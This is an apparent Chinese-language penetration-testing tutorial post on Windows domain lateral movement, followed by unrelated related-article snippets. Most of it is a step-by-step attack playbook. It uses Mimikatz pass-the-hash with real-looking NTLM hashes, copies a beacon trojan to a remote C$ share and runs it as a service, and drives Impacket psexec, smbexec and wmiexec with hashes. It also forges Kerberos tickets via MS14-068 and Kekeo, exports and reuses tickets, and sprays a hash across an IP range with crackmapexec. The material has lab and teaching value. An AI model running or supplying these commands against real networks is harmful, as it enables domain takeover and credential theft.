第130天:内网安全-横向移动PTH哈希PTT 票据PTK密匙Kerberos密码喷射
环境搭建
这里这个环境继续上一篇文章搭建的环境
案例一:域横向移动-PTH-Mimikatz&NTLM
什么是pth?
PTH = Pass The Hash ,通过密码散列值 ( 通常是 NTLM Hash) 来进行攻击。在域环境中,用户登录计算机时使用的域账号,计算机会用相同本地管理员账号和密码。 因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方 法登录到内网主机的其他计算机。另外注意在 Window Server 2012 R2 之前使用到的 密码散列值是 LM 、 NTLM ,在 2012 R2 及其版本之后使用到的密码散列值是 NTLM Hash 。
首先获得一台计算机的权限记得提权到system
抓取明文密码
mimikatz
Mimikatz利用了Windows内核中的某些特性,特别是LSASS(Local Security Authority Subsystem Service)进程,该进程负责处理用户的登录认证。通过模拟系统调用,Mimikatz能够获取到内存中未加密的凭证数据。这使得它在网络安全测试、漏洞评估以及系统管理员的日常工作中扮演着重要角色。
DC1在这台主机登录过,他的hash会记录在本地,可以利用他的hash提权
命令
mimikatz privilege::debug #开启mimikatz调试
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32
/ntlm:518b98ad4178a53695dc997aa02d455c #用mimikatz通过hash连接
dir \\192.168.3.32\c$ #访问共享文件#下载木马执行
copy beacon.exe \\192.168.3.32\c$
sc \\sqlserver create bshell binpath= "c:\4.exe"
sc \\sqlserver start bshell执行hash连接命令,会在win2008中弹出一个窗口(!注意,这里这条命令不能在提权的system中运行,必须在域内的用户administrator或者别的用户执行,否则是按本地用户是找不到域主机的)
访问共享文件
而普通cmd窗口当中是没有权限进行访问的
设置转发上线
生成木马然后复制到目标主机
添加服务
sc \\192.168.3.10 create bshell binpath= "c:\2.exe"这里可以写ip也可以写主机名
添加成功
启动服务
sc \\sqlserver start bshell
成功上线system权限
但是要在对方主机执行这些命令显然不现实,这里了解这种方法就好
impacket套件
具体使用方式上一篇文章介绍过
python3 psexec.py -hashes :579da618cfbfa85247acf1f800a280a4 ./administrator@192.168.3.10
python3 smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 /administrator@192.168.3.10
python3 wmiexec.py -hashes :579da618cfbfa85247acf1f800a280a4 /administrator@192.168.3.10
案例二:域横向移动-PTT-漏洞&Kekeo&Ticket
ms14-068(利用系统漏洞)
在这篇文章中曾经使用过,这里需要注意一点,这个漏洞适用版本是win2012以下的版本,域控是2019的话也会被检测出来是有危险的操作
第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_ad域控提权-CSDN博客
MS14-068漏洞是Kerberos协议中的一个安全漏洞,允许用户在向Kerberos密钥分发中心(KDC)申请TGT(票据授权服务产生的身份凭证)时伪造自己的Kerberos票据。如果KDC在处理这些伪造的票据时没有正确验证票据的签名,那么攻击者就可能获得更高的权限。
利用,这里是根据系统漏洞溢出到高权限提权,所以这里我就用域普通用户来运行
whoami/user #查看sid
查看和清除票据的命令
shell klist #查看票据
shell klist::purge #清除票据
利用工具生成票据,这里本应该设置代理在本地运行,但是是exe文件,我是linux系统所以就先上传了
工具下载地址:
GitCode - 全球开发者的开源社区,开源代码托管平台
注意这里的密码都是自己的,利用自己的低权限身份去提权
利用工具获得票据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
ms14-068.exe -u jie@qq.com -s S-1-5-21-3844935259-2139444640-2602687446-1104 -d 192.168.3.10 -p 123.com
查看生成票据的名字
利用mimikatz导入票据
mimikatz kerberos::ptc TGT_jie@qq.com.ccache
查看当前票据
查看文件
这里需要用主机名进行访问而不能使用ip
Kekeo(利用NTML,高权限)
工具下载地址:Release 2.2.0 20211214 Internals certificate · gentilkiwi/kekeo · GitHub
刚才mimikatz利用域内普通用户就可以提权啊,这个不行必须利用域内管理员用户,但是都已经有高权限用户了还需要这个干啥,鸡肋
抓取密码,如果里面能看到域内管理员的NTML(hash)那么该漏洞可以利用
首先还是需要上传kekeo文件,这里我就不设置代理了还是直接上传
需要清空票据
利用这个工具进行执行生成票据
shell kekeo.exe "tgt::ask /user:administrator /domain:qq.com /ntlm:afffeba176210fad4628f0524bfe1942" "exit"
然后导入票据
shell kekeo.exe "kerberos::ptt TGT_administrator@QQ.COM_krbtgt~qq.com@QQ.COM.kirbi" "exit"
访问共享文件夹
shell dir \\dc1.qq.com\c$
mimikatz(历史ticket)
利用条件是10个小时内,有别的用户连接过这台主机
导出票据(需要system权限去执行,看哪些主机与该主机建立过练习)
mimikatz sekurlsa::tickets /export
清空当前票据
导入票据
选择管理员去尝试
复制文件地址的方式
导入票据
mimikatz kerberos::ptt C:\Windows\system32\[0;5bb95]-2-1-40e00000-administrator@krbtgt-qq.com.kirbi
查看共享文件
如何判断hash是否有效
把用户名写入一个文件夹中,利用工具crackmapexec批量测试
proxychains4 crackmapexec smb 192.168.3.10-30 -u u.txt -H afffeba176210fad4628f0524bfe1942 --continue-on-success
案例三: 域横向移动-PTK-Mimikatz&AES256
利用条件过于苛刻
相关文章:
第130天:内网安全-横向移动PTH哈希PTT 票据PTK密匙Kerberos密码喷射
环境搭建 这里这个环境继续上一篇文章搭建的环境 案例一:域横向移动-PTH-Mimikatz&NTLM 什么是pth? PTH Pass The Hash ,通过密码散列值 ( 通常是 NTLM Hash) 来进行攻击。在域环境中,用户登录计算机时使用的域账号&…...
SB3045LFCT-ASEMI无人机专用SB3045LFCT
编辑:ll SB3045LFCT-ASEMI无人机专用SB3045LFCT 型号:SB3045LFCT 品牌:ASEMI 封装:TO-220F 批号:最新 最大平均正向电流(IF):30A 最大循环峰值反向电压(VRRM&…...
RPA财务机器人是什么,RPA的具体应用场景有哪些?| 实在RPA研究
数字化转型关键期,越来越多的人工智能及超自动化技术在企业财务工作中得以普及应用,以提升财务工作效率,促进财务部门实现 RPA财务机器人是什么? RPA,即机器人流程自动化(Robotic Process Automation&#…...
滑动窗口 | Java | (hot100) 力扣 3
力扣 3.无重复字符的最长子串 暴力法:双层for循环,i-j的字符查重 滑动窗口:因为这题被分在这个类别里,那么已知要用滑动窗口,思路应该是什么。 反正我想不出来…… 看了别人的题解写出来的出错点:特别容易…...
【产品经理】竞品分析怎么理解?拆解一下
什么叫竞品?(研究的对象) 竞品看你怎么理解,有时候不一定是你的竞争对手,有可能是其他行业也做了这个功能,那你也可以学习,有类似的功能或者策略都可以学习,不过这个可能在管理学上…...
合规性导航:处理爬虫数据用于机器学习的最佳实践
在数据驱动的时代,机器学习已成为企业和研究者的重要工具。然而,使用爬虫技术抓取的数据进行机器学习时,合规性问题不容忽视。本文将详细探讨在使用爬虫抓取的数据进行机器学习时可能遇到的合规性问题,并提供相应的最佳实践。 一…...
spring中使用到的设计模式有哪些
Spring 框架是一个高度模块化和灵活的框架,广泛使用了各种设计模式来实现其核心功能和架构。这些设计模式帮助 Spring 提供了高可配置性、可扩展性和可维护性。以下是 Spring 框架中使用到的一些关键设计模式:...
splitcontainer控件设置固定大小
要设置SplitContainer控件以固定的大小,可以通过设置SplitContainer的FixedPanel属性来实现。您还需要设置IsSplitterFixed属性为true来锁定分割条的大小,并且通过设置SplitterWidth或SplitterLength属性来调整分割条的宽度或高度。 以下是一个示例代码…...
最近在写的支付模块
最近再写支付模块就到处借鉴 旨在回顾一下。 1.确认订单功能 使用场景是:用户在选择好购物车后,或者是直接选择商品后(选择商品封装为购物车) 这样做是根据尚硅谷来学习的 目前需要这些属性,原因是在确认订单页面后…...
解决域名加别名后再代理或者映射到fastadmin项目
如果遇到微应用不想再添加或者不方便添加单独的二级域名时,就需要用到代理或者映射来进入到我们的微应用项目中。 可以修改route.php路由文件的下面这个参数 __alias__ > [别名 > 模块/控制器] 如图 然后再修改config.php文件里面的view_replace_str参数…...
Armv9.5架构新增的关键扩展--精简版
Armv9.5架构扩展是对Armv9.4的扩展。它增加了强制性和可选的架构特性。有些特性必须一起实现。实现是符合Armv9.5规范,需要满足以下条件: 符合/兼容Armv9.4规范包含所有Armv9.5架构的强制性特性。符合Armv9.5规范的实现还可以包括: Armv9.5的可选特性以下是arm9.5架构中关键…...
STM32 GPIO 模块
B站视频地址:芯片内部GPIO模块细节 引脚 将 STM32 芯片,类比为【大脑】 而旁边的引脚,类比为【神经】 通过引脚,使得,STM32,可以和外部世界,进行交流 比如,当我们和别人说话时&am…...
网络剪枝——network-slimming 项目复现
目录 文章目录 目录网络剪枝——network-slimming 项目复现clone 存储库Baselinevgg训练结果 resnet训练结果 densenet训练结果 Sparsityvgg训练结果 resnet训练结果 densenet训练结果 Prunevgg命令结果 resnet命令结果 densenet命令结果 Fine-tunevgg训练结果 resnet训练结果 …...
Spring 懒加载的实际应用
引言 在 Spring 框架中,懒加载机制允许你在应用程序运行时延迟加载 Bean。这意味着 Bean 只会在第一次被请求时才实例化,而不是在应用程序启动时就立即创建。这种机制可以提高应用程序的启动速度,并节省内存资源。 Spring 的懒加载机制 懒…...
PyQT 串口改动每次点开时更新串口信息
class MainWindow(QWidget, Ui_Form):def __init__(self):super().__init__(parentNone)self.setupUi(self)self.comboBox.installEventFilter(self) # 加载事件过滤器self.comboBox.addItems(get_ports())def eventFilter(self, obj, event): # 定义事件过滤器if isinstance(o…...
三级_网络技术_19_路由器的配置及使用
1.在Cisco路由器上配置DHCP服务,使得客户端可以分配到的地址范围是222.28.71.2-222.28.71.200地址租用时间是2小时30分钟,不记录地址冲突日志默认路由是222.28.71.1,分配的dns服务器地址是222.28126.27和222.28.126.26。以下配置完全正确的是…...
【STM32 Blue Pill编程】-STM32CubeIDE开发环境搭建与点亮LED
开发环境搭建与点亮LED 文章目录 开发环境搭建与点亮LED1、STM32F103C8T6及STM32 Blue Pill 介绍2、下载并安装STM32CubeIDE3、编程并点亮LED3.1 在Stm32CubeIDE中编写第一个STM32程序3.1.1 创建项目3.1.2 设备配置3.1.2.1 系统时钟配置3.1.2.2 系统调试配置3.1.2.3 GPIO配置3.…...
【数据结构】六、图:4.图的遍历(深度优先算法DFS、广度优先算法BFS)
三、基本操作 文章目录 三、基本操作1.图的遍历1.1 深度优先遍历DFS1.1.1 DFS算法1.1.2 DFS算法的性能分析1.1.3 深度优先的生成树和生成森林 1.2 广度优先遍历BFS1.2.1 BFS算法1.2.2 BFS算法性能分析1.2.3 广度优先的生成树和生成森林 1.3 图的遍历与图的连通性 1.图的遍历 图…...
29、号外!号外!ERA5再分析数据下载方式更新啦
文章目录 1. 前言2. 账号注册与协议签署2.1 账号注册2.2 签署CDS-Beta使用条款2.3 更新.cdsapi文件 3. 常见问题与解决方法(持续更新中)3.1 问题1:更新完.cdsapi文件之后,原有下载代码不可以使用3.2 问题2: RuntimeError: 403 Cli…...
智能识别,2024年SD卡数据恢复软件的智能进化
除了手机之外现在有不少的设备还是依靠SD卡来存储数据,比如相机、摄像头、无人机等。有的时候会因为一些意外的情况导致数据丢失,那是真的丢失了吗?大部分情况还是可以依靠sd卡数据恢复工具来找回这些“消失”的数据哦。 1.福昕数据恢复 链…...
使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式
一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明:假设每台服务器已…...
【Oracle APEX开发小技巧12】
有如下需求: 有一个问题反馈页面,要实现在apex页面展示能直观看到反馈时间超过7天未处理的数据,方便管理员及时处理反馈。 我的方法:直接将逻辑写在SQL中,这样可以直接在页面展示 完整代码: SELECTSF.FE…...
java 实现excel文件转pdf | 无水印 | 无限制
文章目录 目录 文章目录 前言 1.项目远程仓库配置 2.pom文件引入相关依赖 3.代码破解 二、Excel转PDF 1.代码实现 2.Aspose.License.xml 授权文件 总结 前言 java处理excel转pdf一直没找到什么好用的免费jar包工具,自己手写的难度,恐怕高级程序员花费一年的事件,也…...
Docker 运行 Kafka 带 SASL 认证教程
Docker 运行 Kafka 带 SASL 认证教程 Docker 运行 Kafka 带 SASL 认证教程一、说明二、环境准备三、编写 Docker Compose 和 jaas文件docker-compose.yml代码说明:server_jaas.conf 四、启动服务五、验证服务六、连接kafka服务七、总结 Docker 运行 Kafka 带 SASL 认…...
高频面试之3Zookeeper
高频面试之3Zookeeper 文章目录 高频面试之3Zookeeper3.1 常用命令3.2 选举机制3.3 Zookeeper符合法则中哪两个?3.4 Zookeeper脑裂3.5 Zookeeper用来干嘛了 3.1 常用命令 ls、get、create、delete、deleteall3.2 选举机制 半数机制(过半机制࿰…...
Cinnamon修改面板小工具图标
Cinnamon开始菜单-CSDN博客 设置模块都是做好的,比GNOME简单得多! 在 applet.js 里增加 const Settings imports.ui.settings;this.settings new Settings.AppletSettings(this, HTYMenusonichy, instance_id); this.settings.bind(menu-icon, menu…...
第一篇:Agent2Agent (A2A) 协议——协作式人工智能的黎明
AI 领域的快速发展正在催生一个新时代,智能代理(agents)不再是孤立的个体,而是能够像一个数字团队一样协作。然而,当前 AI 生态系统的碎片化阻碍了这一愿景的实现,导致了“AI 巴别塔问题”——不同代理之间…...
数据库分批入库
今天在工作中,遇到一个问题,就是分批查询的时候,由于批次过大导致出现了一些问题,一下是问题描述和解决方案: 示例: // 假设已有数据列表 dataList 和 PreparedStatement pstmt int batchSize 1000; // …...
Netty从入门到进阶(二)
二、Netty入门 1. 概述 1.1 Netty是什么 Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty是一个异步的、基于事件驱动的网络应用框架,用于…...
Linux nano命令的基本使用
参考资料 GNU nanoを使いこなすnano基础 目录 一. 简介二. 文件打开2.1 普通方式打开文件2.2 只读方式打开文件 三. 文件查看3.1 打开文件时,显示行号3.2 翻页查看 四. 文件编辑4.1 Ctrl K 复制 和 Ctrl U 粘贴4.2 Alt/Esc U 撤回 五. 文件保存与退出5.1 Ctrl …...